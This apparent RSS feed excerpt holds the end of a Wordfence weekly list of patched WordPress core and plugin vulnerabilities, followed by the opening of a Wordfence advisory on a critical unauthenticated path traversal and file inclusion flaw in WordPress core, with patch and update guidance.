<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hermanhms" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hermanhms" target="_blank" rel="noopener">hermanhms</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83597e50-1992-4171-b24e-b14f55be6e4c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/adc90b32-f973-4c8e-b419-0614d4642b7f" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference to Arbitrary Post Overwrite</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anthropic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anthropic" target="_blank" rel="noopener">Anthropic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/adc90b32-f973-4c8e-b419-0614d4642b7f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64453a11-e0dd-40f8-99c3-f05ef640b42b" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Authenticated (Contributor+) Path Traversal via REST Templates Controller</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anthropic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anthropic" target="_blank" rel="noopener">Anthropic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64453a11-e0dd-40f8-99c3-f05ef640b42b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c34ef5e3-afcd-4686-861f-5e382812233a" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Forced Theme Install/Preview and Selector Injection via Theme Installer Route</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/paulos-yibelo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/paulos-yibelo" target="_blank" rel="noopener">Paulos Yibelo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c34ef5e3-afcd-4686-861f-5e382812233a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfe52386-bfdc-452f-8dd3-a12b3e39f296" target="_blank" rel="noopener">WP Easy Pay &lt;= 4.5.0 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12739" target="_blank" rel="noopener noreferrer">							CVE-2026-12739						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-easy-pay" target="_blank" rel="noopener">WP Easy Pay – Payment and Donation Form Builder for Square</a> <span class="wfvr-software-slug">[wp-easy-pay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfe52386-bfdc-452f-8dd3-a12b3e39f296" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17faa495-7758-49ec-8418-c5175f9615f2" target="_blank" rel="noopener">WPBot 8.7.2 &#8211; 8.7.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87959" target="_blank" rel="noopener noreferrer">							CVE-2026-87959						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, WordPress Automation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sergey-mkrtchyan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/184bdd6c8c8fd34f7aa5552f451620b5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="184bdd6c8c8fd34f7aa5552f451620b5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sergey-mkrtchyan" target="_blank" rel="noopener">Sergey Mkrtchyan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17faa495-7758-49ec-8418-c5175f9615f2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09ab30ba-61a3-456d-b657-bf4fb679f48b" target="_blank" rel="noopener">WPLP Cookie Consent &lt;= 4.4.3 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85131" target="_blank" rel="noopener noreferrer">							CVE-2026-85131						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09ab30ba-61a3-456d-b657-bf4fb679f48b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f250c22-5615-4223-a7d0-8467cb2f8541" target="_blank" rel="noopener">Xagio SEO &amp; AEO – AI SEO for Google Rankings &amp; AI Visibility &lt;= 7.1.0.43 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78295" target="_blank" rel="noopener noreferrer">							CVE-2026-78295						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/xagio-seo" target="_blank" rel="noopener">Xagio SEO &amp; AEO – AI SEO for Google Rankings &amp; AI Visibility</a> <span class="wfvr-software-slug">[xagio-seo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/matheo-beuve" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/de1f176e39d579ff456e61c79f9cd67d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="de1f176e39d579ff456e61c79f9cd67d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/matheo-beuve" target="_blank" rel="noopener">Matheo Beuve</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f250c22-5615-4223-a7d0-8467cb2f8541" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-low">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c41aadb1-e1a6-4bda-ac94-c461c320e78f" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; HTML API set_modifiable_text() Comment Boundary Break</a></h4>
<div class="cvss-score-badge">3.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>3.7 (Low)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jeremy-felt" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jeremy-felt" target="_blank" rel="noopener">Jeremy Felt</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c41aadb1-e1a6-4bda-ac94-c461c320e78f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-low">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8631b31a-b892-4667-9e64-b4ded1815977" target="_blank" rel="noopener">NextGEN Gallery &lt;= 4.4.0 &#8211; Authenticated (Admin+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">2.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>2.7 (Low)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81653" target="_blank" rel="noopener noreferrer">							CVE-2026-81653						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nextgen-gallery" target="_blank" rel="noopener">Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery</a> <span class="wfvr-software-slug">[nextgen-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8631b31a-b892-4667-9e64-b4ded1815977" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-low">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/680f1ce3-43ca-4325-9601-f5df4f7e5d31" target="_blank" rel="noopener">NextGEN Gallery &lt;= 4.4.0 &#8211; Authenticated (Admin+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">2.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>2.7 (Low)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81651" target="_blank" rel="noopener noreferrer">							CVE-2026-81651						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nextgen-gallery" target="_blank" rel="noopener">Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery</a> <span class="wfvr-software-slug">[nextgen-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/murad-akhmedov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f841eaba66a4d4f2f2c47ac96eed83c2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f841eaba66a4d4f2f2c47ac96eed83c2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/murad-akhmedov" target="_blank" rel="noopener">Murad Akhmedov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/680f1ce3-43ca-4325-9601-f5df4f7e5d31" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-low">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1ae2c7-1eff-4976-8f88-f0b97a5cf323" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Authenticated (Administrator+) Missing Authorization to Network Plugin Activation (Multisite)</a></h4>
<div class="cvss-score-badge">2.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>2.7 (Low)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jesse-mcneil" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jesse-mcneil" target="_blank" rel="noopener">Jesse McNeil</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1ae2c7-1eff-4976-8f88-f0b97a5cf323" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div></div>
<hr>
<p><em>As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.</em></p>
<p>This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.</p>
<p><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/wordfence-intelligence-weekly-wordpress-vulnerability-report-september-14-2026-to-september-20-2026/" target="_blank" rel="noopener">Wordfence Intelligence Weekly WordPress Vulnerability Report (September 14, 2026 to September 20, 2026)</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>PSA: Critical Unauthenticated Path Traversal Vulnerability Patched in WordPress Core</title>
		<link>https://swiftupdates.ca/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Tue, 22 Sep 2026 23:40:24 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/</guid>

					<description><![CDATA[On September 22, 2026, the WordPress Security Team released WordPress 7.1.2, as well as security backports for every branch back to WordPress 4.7 to address a critical unauthenticated path traversal vulnerability. The issue is tracked as CVE-2026-87902 and has a CVSS v4.0 score of 9.2 (Critical). The vulnerability can allow an unauthenticated attacker to make [&#8230;]]]></description>
										<content:encoded><![CDATA[<div>
<p>On September 22, 2026, the WordPress Security Team released <a href="https://wordpress.org/download/releases/" target="_blank" rel="noopener noreferrer">WordPress 7.1.2, as well as security backports for every branch back to WordPress 4.7</a> to address a critical unauthenticated path traversal vulnerability. The issue is tracked as <a href="https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-7hp8-65ch-5whp" target="_blank" rel="noopener noreferrer">CVE-2026-87902</a> and has a CVSS v4.0 score of <strong>9.2 (Critical)</strong>.</p>
<p>The vulnerability can allow an unauthenticated attacker to make WordPress include a readable PHP file from outside the active theme directory. If the site’s active theme and server environment meet the necessary conditions, the included file can provide a path to remote code execution and complete site compromise.</p>
<p>We strongly recommend that all WordPress site owners update immediately and confirm that the update completed successfully. Although exploitation depends on the site’s theme layout and the presence of a suitable local PHP file, the vulnerable behavior is in WordPress Core, requires no account, and can be reached over the internet.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener noreferrer">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Wordfence Response</a> customers received a firewall rule protecting against attacks targeting this vulnerability on <strong>September 22, 2026</strong>, the day the vulnerability was disclosed. Wordfence Free users will receive the same protection on <strong>October 22, 2026</strong>, following the standard 30-day delay.</p>
<div>
<div>Key takeaways:</div>
<ul>
<li><strong>CVE-2026-87902</strong> is a critical unauthenticated path traversal and local PHP file inclusion vulnerability in WordPress Core.</li>
<li>Successful exploitation does not require a WordPress account or user interaction.</li>
<li>Remote code execution is conditional. The active parent or child theme must contain a suitable top-level <code>page-*</code> directory, and the server must contain a readable PHP file that has useful behavior when included.</li>
<li>The official advisory cites legacy Twenty Twelve and Twenty Fourteen, as well as Neve, Hestia, and Sydney, as examples of themes with the relevant directory layout. Administrators should verify their installed theme and filesystem rather than infer exposure from a theme name alone.</li>
<li>WordPress <strong>7.1.2</strong> contains the fix. WordPress also released security backports for branches 7.0 through 4.7.</li>
<li>Wordfence Premium, Care, and Response customers received firewall protection on <strong>September 22, 2026</strong>. Wordfence Free users will receive the same protection on <strong>October 22, 2026</strong>.</li>
<li><strong>Site owners should update to the fixed release for their branch immediately.</strong> Firewall protection reduces exposure but is not a replacement for updating WordPress Core.</li>
</ul>
</div>
<div>
<div>Contents</div>
<ul>
<li><a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/#vulnerability-summary" target="_blank" rel="noopener">Vulnerability Summary from Wordfence Intelligence</a></li>
<li><a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/#what-makes-this-vulnerability-serious" target="_blank" rel="noopener">What Makes This Vulnerability Serious</a></li>
<li><a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/#technical-analysis" target="_blank" rel="noopener">Technical Analysis</a></li>
<li><a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/#how-the-patch-works" target="_blank" rel="noopener">How the Patch Works</a></li>
<li><a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/#who-is-affected" target="_blank" rel="noopener">Who Is Affected</a></li>
<li><a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/#wordfence-protection" target="_blank" rel="noopener">Wordfence Protection</a></li>
<li><a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/#what-site-owners-should-do-now" target="_blank" rel="noopener">What Site Owners Should Do Now</a></li>
<li><a href="https://www.wordfence.com/blog/2026/09/psa-critical-unauthenticated-path-traversal-vulnerability-patched-in-wordpress-core/#conclusion" target="_blank" rel="noopener">Conclusion</a></li>
</ul>
</div>
<hr>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6ff76d9b-aa12-4391-90cd-f9df36d4a3a5" target="_blank" rel="noopener">WordPress Core &lt;= 7.1.1 &#8211; Unauthenticated Local File Inclusion via locate_template() Path Traversal</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87902" target="_blank" rel="noopener noreferrer">							CVE-2026-87902						</a>					</strong>
				</div>
